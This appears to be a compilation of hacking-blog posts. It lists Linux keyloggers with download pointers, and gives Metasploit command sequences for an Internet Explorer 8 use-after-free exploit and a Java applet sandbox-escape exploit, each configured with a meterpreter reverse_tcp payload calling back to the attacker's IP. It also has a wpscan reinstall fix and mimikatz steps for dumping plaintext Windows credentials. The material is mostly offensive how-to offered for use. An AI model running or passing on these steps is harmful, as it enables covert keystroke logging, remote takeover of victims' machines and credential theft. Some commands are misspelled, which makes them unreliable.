List of Linux Key loggers

List of Linux Key loggers :-

(1)LKL:-

LKL is a user space keylogger that runs under linux--x86/arch. LKL sniffs and logs everything passes trought the hardware keyboard port (0x60).

Download From here

(2)Log Key:-

logkeys is a linux keylogger. It is no more advanced than other available linux

keyloggers, notably lkl and uberkey, but is a bit newer, more up to date, it doesn't unreliably repeat keys and it shouldn't crash your X. All in all, it just seems to work. It relies on event interface of the Linux input subsystem.

Once completely set, it logs all common character and function keys, while also

being fully aware of Shift and Altr key modifiers.

Download from here

(3)Ttypld:-

ttyrpld is a kit to log any traffic and actions which go through any of your Kernel's tty

devices. In common-term language, this is a Keylogger

Download from here

(4)uber key :-

Download link

(5)Vlogger:-

Download link

(6)Simple keylogger Python script:-

Download here

If you are free & want to learn how keyboard driver works in linux kernal , I would recommended you to read from following link .

http://thc.org/papers/writing-linux-kernel-keylogger.txt

Also read this article which is quite interesting. http://theinvisiblethings.blogspot.in/2011/04/linux-security-circus-on-gui-isolation.html

Exploit 0Day vulnerability in Internet Exploit 8

Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability

This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.

Exploit Targets

    0 - Automatic (default)
    1 - IE 8 on Windows XP SP3
    2 - IE 8 on Windows Vista
    3 - IE 8 on Windows Server 2003
    4 - IE 8 on Windows 7

msf > use exploit/windows/browser/ie_cgenericelement_uaf
msf exploit(ie_cgenericelement_uaf) > show payloads
msf exploit(ie_cgenericelement_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_cgenericelement_uaf) > set LHOST [MY IP ADDRESS]
msf exploit(ie_cgenericelement_uaf) > exploit

Java Applet Reflection Type Confusion Remote Code Execution

Java Applet Reflection Type Confusion Remote Code Execution

This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass.

Exploit Targets

    0 - Generic (Java Payload) (default)
    1 - Windows x86 (Native Payload)
    2 - Mac OS X x86 (Native Payload)
    3 - Linux x86 (Native Payload)

(1)msfconsole


(2)msf > use exploit/multi/browser/java_jre17_reflection_types

(3)msf exploit(java_jre17_reflection_types) > show payloads

(4)msf exploit(java_jre17_reflection_types) > set PAYLOAD java/meterpreter/reverse_tcp

(5)msf exploit(java_jre17_reflection_types) > set LHOST [MY IP ADDRESS]

(6)msf exploit(java_jre17_reflection_types) > exploit

HOw to Solve problem of wpscan in Backtrack 5 r3?

Wpscan is wordpress security scanner, which is pre-installed in backtrack 5 , but it`s outdated version, so when you tried to update it, you may  have face some problems. Here is solution which work for me.

cd /pentest/web
rm -rf wpscan
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan

gem install bundler && bundle install --without test development
apt-get install libxml2 libxml2-dev libxslt1-dev
gem install  bundler

bundle install

ruby ./wpscan.rb

Get Clear Text Credentials of windows

Today we are going to use new tools which can be use to get windows password in plain text. It works on both 32 bit & 64 bit O.S.  We have already known  NTLM password cracking methods, but it`s time consuming , & sometimes we could not get password in plain text. But this tools is amazing , which works on method of Pass the pass.

In this tutorial we are going to use this tool in local computer , But in next we will use this tool to get passwords of Remote P.C.  using  metasploit.

(1)Download     tool  from here

(2)After Extracting open win32 or x64 depending upon your O.S.

(3)Run as Administration mimikatz.

(4)Now type privilege::debug  , this command check if mimikitz running with system privilege

(5)In order to get credential in plain text type this command sekurlsa::logonPaswords full

(6)You can see credential in plain text.

Next we will use metasploit to get credential of Remote P.C.